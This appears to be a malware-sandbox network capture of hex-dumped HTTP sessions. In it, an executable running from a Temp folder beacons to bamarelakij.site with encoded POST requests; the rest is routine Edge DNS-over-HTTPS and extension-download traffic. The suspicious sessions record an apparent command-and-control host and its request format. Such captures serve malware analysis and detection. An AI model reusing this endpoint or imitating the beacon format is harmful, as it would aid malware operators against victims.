2025-01-09 13:56:00 UTC	1369	IN	Data Raw: 16 11 02 ec 08 72 59 a5 06 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 0b 00 e9 07 7c 08 13 00 ec 0e 16 11 02 ec 08 76 59 7c 08 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b0 3a b2 07 00 22 0c 52 01 13 00 ec 0e 16 11 02 ec 08 76 59 52 01 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 16 00 c6 07 38 07 13 00 ec 0e 16 11 02 ec 08 9a 59 38 07 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 2a b4 b3 34 3a 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 2a 06 04 05 0f 00 e4 0e 16 11 02 e4 04 72 59 04 05 5f 60 67 d8 af 45 a8 eb 08 00 c7 02 33 0f 13 00 ec 0e 16 11 02 ec 08 d8 59 33 0f 65 9b b6 a7 b7 51 c9 59 b2 32 b3 b2 17 b2 3c b2 07 00 cc 0e a3 08 13 00 ec 0e 16 11 02 ec 08 76 59 a3 08 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 07 00 f5 06 2c 04 13 00 ec 0e 16 11 02 ec 08 Data Ascii: rYeQY99\|vY\|eQY&6::"RvYReQY))'8Y8eQY;7.4:+'.2:57rY_`gE3Y3eQY2<vYeQY))',
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: da 53 52 ec c1 c2 b0 d2 e6 60 14 1f 0a 00 51 03 3c 08 13 00 ec 0e 16 11 02 ec 08 72 59 3c 08 65 9b b6 a7 b7 51 c9 59 b9 3a 39 22 b0 3a b0 22 b4 39 07 00 63 06 8e 0a 13 00 ec 0e 16 11 02 ec 08 9a 59 8e 0a 65 9b b6 a7 b7 51 c9 59 29 b2 b0 36 2b 27 a1 01 00 90 06 86 0d 13 00 ec 0e 16 11 02 ec 08 72 59 86 0d 65 9b b6 a7 b7 51 c9 59 15 07 00 19 0a 41 00 13 00 ec 0e 16 11 02 ec 08 76 59 41 00 65 9b b6 a7 b7 51 c9 59 a1 aa 29 29 a2 27 2a 15 00 73 0a 4a 03 13 00 ec 0e 16 11 02 ec 08 9a 59 4a 03 65 9b b6 a7 b7 51 c9 59 3b 37 b1 2e 29 b2 b0 36 2b 27 a1 2e 32 b0 3a b0 17 35 b9 b7 37 04 00 a3 0b 90 08 0f 00 e4 0e 16 11 02 e4 04 61 59 90 08 1b e9 48 a8 eb c8 87 9b 04 00 33 06 fa 06 0f 00 e4 0e 16 11 02 e4 04 76 59 fa 06 f1 6d cc 96 00 48 03 a5 25 00 e1 04 63 0c 13 00 Data Ascii: SR`Q<rY<eQY:9":"9cYeQY)6+'rYeQYAvYAeQY))'*sJYJeQY;7.)6+'.2:57aYH3vYmH%c
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: 39 04 00 41 0c cc 04 0f 00 e4 0e 16 11 02 e4 04 d8 59 cc 04 ec 5f 04 4b 73 a8 62 60 07 00 36 00 3f 0f 13 00 ec 0e 16 11 02 ec 08 9a 59 3f 0f 65 9b b6 a7 b7 51 c9 59 38 39 b4 3b b0 3a b2 07 00 96 06 c8 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 c8 0a 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 04 00 21 09 76 0c 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0c fb 52 3e bf 0a 77 f1 8c 08 00 71 02 11 0c 13 00 ec 0e 16 11 02 ec 08 72 59 11 0c 65 9b b6 a7 b7 51 c9 59 31 36 b5 32 b0 3a b0 15 04 00 61 0a a5 01 0f 00 e4 0e 16 11 02 e4 04 76 59 a5 01 d6 2e 11 d5 27 0b de e6 04 00 92 05 0d 06 0f 00 e4 0e 16 11 02 e4 04 73 59 0d 06 cd 2c 10 df 3d 0d df ec 08 00 09 08 5a 01 13 00 ec 0e 16 11 02 ec 08 30 59 5a 01 65 9b b6 a7 b7 51 c9 59 34 b0 39 32 bb b0 39 b2 04 00 f4 0d a6 04 0f 00 Data Ascii: 9AY_Ksb`6?Y?eQY89;:YeQY7"!v4YvR>wqrYeQY162:avY.'sY,=Z0YZeQY4929
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: 65 9b b6 a7 b7 51 c9 59 a6 a0 27 a4 23 a2 a9 2a 15 10 00 22 07 b5 0d 13 00 ec 0e 16 11 02 ec 08 9a 59 b5 0d 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 29 b2 b0 36 2b 27 a1 15 00 73 09 7f 0c 13 00 ec 0e 16 11 02 ec 08 73 59 7f 0c 65 9b b6 a7 b7 51 c9 59 b9 34 b7 39 3a b1 ba 3a b9 96 b1 ba b9 3a b7 b6 17 35 b9 b7 37 08 00 42 05 b3 0a 13 00 eb 0e 16 11 02 eb 08 76 59 b3 0a 96 c5 39 09 d9 75 16 03 65 5b a6 6e e5 46 50 f0 08 00 2f 0f f2 02 13 00 ec 0e 16 11 02 ec 08 76 59 f2 02 65 9b b6 a7 b7 51 c9 59 ab b2 31 10 22 b0 3a b0 08 00 96 08 2b 0d 13 00 eb 0e 16 11 02 eb 08 76 59 2b 0d 97 12 79 3e 92 e2 44 fc 66 8c e6 59 ae d1 02 0f 04 00 d0 02 48 05 0f 00 e4 0e 16 11 02 e4 04 ed 59 48 05 f5 fc a4 11 04 d9 6b 22 42 00 f9 0e d7 0a 13 00 ec 0e 16 11 02 ec 08 Data Ascii: eQY'#"YeQY#).)6+'ssYeQY49:::57BvY9ue[nFP/vYeQY1":+vY+y>DfYHYHk"B
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 04 00 35 0d 51 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 51 0e f4 c9 71 76 05 ec be 45 08 00 cf 0c dc 04 13 00 ec 0e 16 11 02 ec 08 72 59 dc 04 65 9b b6 a7 b7 51 c9 59 a2 36 b2 b1 3a 39 ba b6 04 00 8a 07 5d 09 0f 00 e4 0e 16 11 02 e4 04 d8 59 5d 09 c1 f9 e3 82 87 36 6d a2 04 00 ec 0c cc 0a 0f 00 e4 0e 16 11 02 e4 04 34 59 cc 0a 9f 6a 11 53 6e 4f de 60 04 00 74 0d 84 0f 0f 00 e4 0e 16 11 02 e4 04 d8 59 84 0f 86 61 e0 37 b5 55 3b 26 12 00 57 0f 1c 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 1c 0b 65 9b b6 a7 b7 51 c9 59 21 b7 b7 3a b9 3a 39 b0 38 a1 b0 b1 34 b2 17 38 b5 b3 05 00 ac 03 46 02 13 00 ec 0e 16 11 02 ec 08 72 59 46 02 65 9b b6 a7 b7 51 c9 59 b9 3a 3c b7 Data Ascii: 6.49.886:7.49<5Q4YQqvErYeQY6:9]Y]6m4YjSnO`tYa7U;&WYeQY!::9848FrYFeQY:<
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: 04 34 59 4a 0e 6d 48 cd 1f 9c 6d 02 2c 08 00 98 05 7c 05 13 00 ec 0e 16 11 02 ec 08 76 59 7c 05 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 1d 05 73 06 13 00 ec 0e 16 11 02 ec 08 9a 59 73 06 65 9b b6 a7 b7 51 c9 59 32 b2 3b b4 b1 b2 a4 32 08 00 01 07 7e 0a 13 00 eb 0e 16 11 02 eb 08 76 59 7e 0a 44 4e b0 2a 09 b2 fd 29 b5 d0 2f 4d 35 81 bb da 08 00 a3 05 96 0c 13 00 ec 0e 16 11 02 ec 08 76 59 96 0c 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 61 07 10 01 13 00 ec 0e 16 11 02 ec 08 7a 59 10 01 65 9b b6 a7 b7 51 c9 59 28 39 b7 33 b4 36 b2 b9 04 00 16 0d f4 02 0f 00 e4 0e 16 11 02 e4 04 72 59 f4 02 a2 40 03 57 53 65 cc 64 0a 00 0d 03 9c 0c 13 00 ec 0e 16 11 02 ec 08 76 59 9c 0c 65 9b b6 a7 b7 51 c9 59 26 b7 b3 b4 37 10 22 b0 3a b0 04 00 65 Data Ascii: 4YJmHm,\|vY\|eQY8936sYseQY2;2~vY~DN*)/M5vYeQY8936azYeQY(936rY@WSedvYeQY&7":e
2025-01-09 13:56:00 UTC	1369	IN	Data Raw: b2 17 b2 3c b2 04 00 65 0f 15 05 0f 00 e4 0e 16 11 02 e4 04 76 59 15 05 0d 83 3d 7e fc a6 f2 4d 04 00 f0 0e 3a 08 0f 00 e4 0e 16 11 02 e4 04 ed 59 3a 08 b8 b0 eb e2 49 95 24 d1 04 00 c4 0b b0 0e 0f 00 e4 0e 16 11 02 e4 04 72 59 b0 0e 45 22 23 14 b5 e6 19 22 0b 00 3f 02 6f 09 13 00 ec 0e 16 11 02 ec 08 d8 59 6f 09 65 9b b6 a7 b7 51 c9 59 31 39 b7 bb b9 b2 39 17 b2 3c b2 04 00 bd 01 51 09 0f 00 e4 0e 16 11 02 e4 04 72 59 51 09 89 54 7b 8b 79 90 41 bd 20 00 b6 06 b9 05 13 00 ec 0e 16 11 02 ec 08 73 59 b9 05 65 9b b6 a7 b7 51 c9 59 32 b4 b9 b1 b7 39 32 38 3a 31 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 08 00 86 0e 4c 02 13 00 eb 0e 16 11 02 eb 08 76 59 4c 02 f2 0e f8 88 63 63 1c 7a 1d 90 67 ef 5f 50 5a 89 05 00 9c 02 83 01 13 00 ec 0e Data Ascii: <evY=~M:Y:I$rYE"#"?oYoeQY199<QrYQT{yA sYeQY2928:1.&6:9.6;621LvYLcczg_PZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49976	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:01 UTC	425	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 53 Host: bamarelakij.site
2025-01-09 13:56:01 UTC	53	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2025-01-09 13:56:01 UTC	748	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:56:01 GMT Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2q0e3O5kmFdISrlBA%2Fii%2FR11G%2BPCdEQnP2UQZbjudUBzllrkZbDJS2zKc0rYEBbzopmmHbbSFsM%2Bo4pXauYgT8S9ghxc4WvLhZga9sMVFAmFscXfjnXD2duZIDslqmAro3WQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4eda619c542c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1564&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1114&delivery_rate=1759036&cwnd=203&unsent_bytes=0&cid=ed018b754c3b65a9&ts=331&x=0"
2025-01-09 13:56:01 UTC	24	IN	Data Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a Data Ascii: 12
2025-01-09 13:56:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49977	172.67.174.91	443	1076	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:02 UTC	426	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o Content-Length: 208 Host: bamarelakij.site
2025-01-09 13:56:02 UTC	208	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: R=,@5YI`H1(((
2025-01-09 13:56:02 UTC	797	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:56:02 GMT Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKrHdPF8wPqdtLwJzIzP56U%2BZNDGi9d%2FB3E25URccCVHcG%2BNLlxZjEQJ7i0lM8RT%2FFxCeR6Zu48hrcAT2qauoZ2dtqwj8rIMcNA1sATMI4MQb5VK3zol7h2SHiU2kMBUclop"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4edaba88542d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1794&rtt_var=717&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1270&delivery_rate=1480730&cwnd=221&unsent_bytes=0&cid=c855d1c181d83427&ts=336&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	50011	172.64.41.3	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:14 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:56:14 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:56:14 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:56:14 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4edf51edaf793-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:56:14 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom%()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	50010	162.159.61.3	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:14 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:56:14 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:56:14 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:56:14 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4edf519e4efa9-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:56:14 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	50012	162.159.61.3	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:14 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2025-01-09 13:56:14 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2025-01-09 13:56:14 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 09 Jan 2025 13:56:14 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ff4edf5189942f5-EWR alt-svc: h3=":443"; ma=86400
2025-01-09 13:56:14 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom))

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	50016	142.250.185.97	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:14 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2025-01-09 13:56:15 UTC	563	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Wed, 08 Jan 2025 15:58:13 GMT Expires: Thu, 08 Jan 2026 15:58:13 GMT Cache-Control: public, max-age=31536000 Age: 79082 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-09 13:56:15 UTC	827	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
2025-01-09 13:56:15 UTC	1390	IN	Data Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
